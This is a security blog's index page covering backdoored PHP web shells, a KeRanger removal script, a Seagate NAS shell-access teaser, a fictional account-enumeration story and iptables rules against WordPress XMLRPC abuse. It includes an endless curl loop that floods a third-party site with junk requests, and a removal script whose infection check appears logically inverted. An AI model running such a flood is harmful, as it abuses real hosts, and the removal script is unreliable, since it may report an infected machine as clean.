fail, malware, php, random, research, scripts, security, shell, Uncategorized

Shady shells

I was in need of some web shells for some security research I was conducting. I found w0rms.com which has a nice selection of shells that can be downloaded to accomodate my need to test some malicious PHP code in my application.

Backdoor

As expected every shell on w0rms.com is backdoored (backdoor the backdoors eh?).

This code is found at the bottom of EVERY shell supplied by w0rms.com. These scripts are inherently to not be trusted or run on your web server as they are often backdoored and do all kinds of other nasty things. They are used by bad actors to view, modify, and often upload more files to compromised PHP web applications. The javascript found in each of the supplied web shells is sending the location of each web shell to the owners of w0rms.com:

This means that when a bad actor uses a malicious web shell that was posted on w0rms.com the location of that shell is sent to the owners of w0rms.com. From here the owners of w0rms.com likely automatically upload additional malicious code. This is very common and clearly points out that there is no honor among script kiddies.

I hope that they sanitize their input and check that it’s actually a valid URL 🙂

$ while true; do curl -A butts http://w0rms.com/oku/kaydet.php?a=$RANDOM; done

Standard
malware, random, scripts

KeRanger ransomware removal script

KeRanger isn’t the first malware for OS X, but it’s annoying and inconvenient as most ransomware is. I wrote this little script to check for KeRanger and remove it if found on your OS X machine. Read and understand the script before you run it as you should with any code you execute on your system. This comes with no guarantee or warranties — just high-fives. Also on Github. This only works BEFORE the lockout.

#!/bin/bash
#
# @dustyfresh
# 
# March 2016
#

if [[ ! -e "/Applications/Transmission.app/Contents/Resources/General.rtf" || ! -e "/Volumes/Transmission/Transmission.app/Contents/Resources/General.rtf" ]]; then
	echo "Yay. This machine is not infected."
else
	echo "Infected -- we are going to need your password so we can remove KeRanger from your system."
	echo "Would you like to proceed with removing malware? (y/n)"
	read answer
	if [[ $answer == "y" ]]; then
		echo "Removing KeRanger....."
		sudo pkill -f 'kernel_service' &>/dev/null
		for f in /Users/Library/kernel_service /Applications/Transmission.app; do
			sudo rm -rf $f
		done
		for f in ~/Library/.kernel_pid ~/Library/.kernel_time ~/Library/.kernel_complete ~/.kernel_service; do
			rm -rf $f
		done
		echo "Removed. We recommend that you reboot. Would you like to reboot now?"
		read reboot_answer
		if [[ $reboot_answer == "y" ]]; then
			sudo reboot
		else
			exit 1
		fi
	else
		exit 1
	fi
fi
Standard
php, privilege escalation, python, random, research, security, shell

Getting a reverse shell on your Seagate personal NAS

Three_Seashells

I needed a cheap NAS system and had originally intended to give this one away as a gift to a relative for Christmas. However, said relative isn’t very technical and tl;dr I’m awful at choosing gifts for people so I decided to poke the proprietary device and see if we could have some fun with it.

The exact model that we will be talking about in this post is the Seagate Personal Cloud 3TB (STCR3000101).Here are a list of useful features:

  • Time Machine backup support for OS X (Broken on El Capitan)
  • Stream to Chromecast / AppleTV / Roku, LG & Samsung smart TVs
  • Use the Seagate media app to access content remotely
  • Web based control panel
  • Ability to install 3rd party applications like WordPress, OwnCloud, and Plex media server (This functionality will be important later)
  • more features are included but less important to me

So let’s start up by connecting this thing to our network and perform a port scan.

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
81/tcp open hosts2-ns
82/tcp open xfer
83/tcp open mit-ml-dev
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
548/tcp open afp
631/tcp open ipp
1080/tcp open socks
2222/tcp open EtherNetIP-1
3128/tcp open squid-http
8000/tcp open http-alt
8080/tcp open http-proxy
8088/tcp open radan-http
8888/tcp open sun-answerbook
9000/tcp open cslistener
9091/tcp open xmltec-xmlmail

As you can see there isn’t anything special, but there are some services we care about like SSH / SFTP, HTTP(s), etc. My initial test of bruteforcing the root user via SSH and sFTP did not seem to work. So looks like we’ll have to find another way to get shell access.

I mentioned about the useful features this proprietary NAS comes with, and this is exactly what we will be taking advantage of to get our shell today. How can we get shell access without SSH?

Continue reading

Standard
exploits, fail, php, research, scripts, security, Uncategorized

Pwning the utility company

Edit: This is a fictitious story, there is no utility company, our villain in this story “the utility company” is an example. However attacks like this occur every day, so I wanted to shine light on how they happen in a proof of concept that was displayed properly to my audience in a safe environment and with an entertaining back-story. Take the article with a grain of salt and always be responsible in disclosure. I hope that you enjoy the read.

One day a user was checking their mail and had realized that they failed to take care of a utility bill. Frantically, they took steps to pay the bill online via the self-service web application. The application was fairly simple and straight forward. In order to “authenticate”, if you could call it that, was to enter the account number and hit a button to continue. Upon hitting the button needed to continue the payment process the user was displayed a page with several pieces of personally identifiable information (the same data in a phone book):

  • Address
  • First & Last name
  • Phone number

In such an angry state of mind the user tried to login as fast as they could, mashing the keys that consisted of their assigned account number so that they can get the sting of another bill out of the way. Hitting the enter key displayed the usual page that they were used to seeing, asking them to confirm account information, except something this time was very different. The name was not correct, it was someone else’s name that lives in the same state as the user, and obviously uses the same utility company. Confirming the account number was correct the user noticed that the last digit was the issue, it was exactly one digit above their account number. Typically this indicates that the account numbers are based on incremental values (more than likely auto_increment). Are you thinking what I am? This could be scraped. So I setup a test lab with my own code and fake data to test a proof of concept.

Continue reading

Standard
BASH, exploits, random, research, scripts, security

Thwarting WordPress XMLRPC & GHOST attacks

http://i.imgur.com/GcI4xxd.gif

GHOST – CVE-2015-0235 hit the internet and caused a lot of commotion, and it was found to affect WordPress installations through xmlrpc.php. This file is constantly a security issue to the WordPress community. The file has caused things from successful brute-force attacks, to XMLRPC DoS attacks that bring down the targeted website. The XMLRPC protocol is used by WordPress to add entries in a programmatic manner. Using my favorite iptables module (string) we can drop requests that are attempting to abuse xmlrpc.php. By dropping this traffic we thwart any potential DoS, brute-force, and GHOST attacks that are being automated right now.

$ iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --name wordpress-XMLRPC-firewall --update --seconds 10 --hitcount 3 -m string --string 'GET /xmlrpc.php HTTP/1.1' --algo bm -j DROP

$ iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --name wordpress-XMLRPC-firewall --update --seconds 10 --hitcount 3 -m string --string 'POST /xmlrpc.php HTTP/1.1' --algo bm -j DROP

What is happening above is that we are looking for traffic on port 80 initiating a new connection, and then we use the strings module to find the HTTP request and then we drop the traffic originating from the attacker if they open more than 3 connections on xmlrpc.php in less than 3 seconds, then they are therefore unable to initiate connections over port 80 thus thwarting the most common attacks on WordPress XMLRPC.

Standard